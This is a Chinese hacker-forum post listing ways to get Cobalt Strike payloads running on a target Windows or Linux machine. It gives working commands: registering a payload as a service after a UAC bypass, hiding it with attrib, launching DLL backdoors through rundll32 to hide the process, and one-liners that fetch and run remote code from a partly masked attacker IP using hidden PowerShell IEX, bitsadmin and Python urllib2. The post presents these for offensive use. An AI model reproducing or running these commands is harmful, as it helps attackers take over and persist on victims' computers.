跳转到帖子

游客您好,欢迎来到黑客世界论坛!您可以在这里进行注册。

赤队小组-代号1949(原CHT攻防小组)在这个瞬息万变的网络时代,我们保持初心,创造最好的社区来共同交流网络技术。您可以在论坛获取黑客攻防技巧与知识,您也可以加入我们的Telegram交流群 共同实时探讨交流。论坛禁止各种广告,请注册用户查看我们的使用与隐私策略,谢谢您的配合。小组成员可以获取论坛隐藏内容!

TheHackerWorld官方

精选回复

发布于

总结一下几个常用的cs上线方式。

Windows EXE

1c4442f167d02c3.png

点击Generate,会生成一个exe文件,令目标机器运行此exe文件,即可上线。

Windows Service EXE

虽然这也是一个exe文件,但是它需要通过服务来上线。我们先创建好exe文件

76ab8b8757a354f.png

接下来,我们需要bypass uac,拿到system权限,在目标机器上创建服务

sc create Microsoft_666 binPath= C:\Users\user\Desktop\service.exe

这里需要注意一点,binPath=[空格],等号后面需要接一个空格,并且P要大写。

sc start Microsoft_666//目标机器开启服务即可上线

sc delete Microsoft_666//删除服务

1f1155310d32d72.png

为了更加隐蔽,我们可以将该exe设置为隐藏文件,利用命令attrib +h service.exe,将文件变为隐藏文件。

去掉隐藏命令为:attrib -h service.exe

Windows DLL

c2deec07f69d631.png

对于dll呢,我们利用命令 rundll32.exe 123.dll Start

rundll32.exe用来执行32位或64位的dll文件,它的作用是执行DLL文件中的内部函数,这样在进程当中,只会有 Rundll32.exe,而不会有DLL后门的进程,这样,就实现了进程上的隐藏。

我们可以利用命令wmic process where caption="rundll32.exe" get caption,commandline /value,查看rundll32.exe是否被注入

b72f03de04059a4.png

如果dll注入到其他进程,我们就不可以利用wmic来查看,这时我们需要使用另外一条命令来进行查看 tasklist /m 123.dll

cb68d54cd85071c.png

注意:如果一个dll注入到系统进程中,不要去结束这个系统进程,否则系统会崩溃。

Power shell

Powershell简介

powershell是从Windows7才开始出现的,所以此脚本上线的方式,只对Windows7之后出现的Windows版本有效,Windows server的话是对2008及以后的版本有效。

2ac20b360b725c6.png

继续选择

e9121a5ab94c784.png

之后,我们会得到一串代码

powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://1xx.1xx.2xx.1xx:80/a'))"

只要我们在目标机器上运行此代码,即可上线成功。

969485a30646ff3.png

 

bitsadmin

917a8be4b9bdbca.png

得到一串代码:

cmd.exe /c bitsadmin /transfer 61f0 http://1xx.1xx.2xx.1xx:80/abb %APPDATA%\61f0.exe&%APPDATA%\61f0.exe&del %APPDATA%\61f0.exe

3c63092a6b9d89d.png

运行结束即可上线成功。

 

Python

利用Python脚本进行上线,多半是在linux环境中使用,但如果Windows目标机器中存在python环境,我们也可以使用。

2b34f73547ce8b2.png得到:

python -c "import urllib2; exec urllib2.urlopen('http://1xx.1xx.2xx.1xx:80/a/python').read();"

运行即可上线。

创建帐户或登录后发表意见

最近浏览 0

  • 没有会员查看此页面。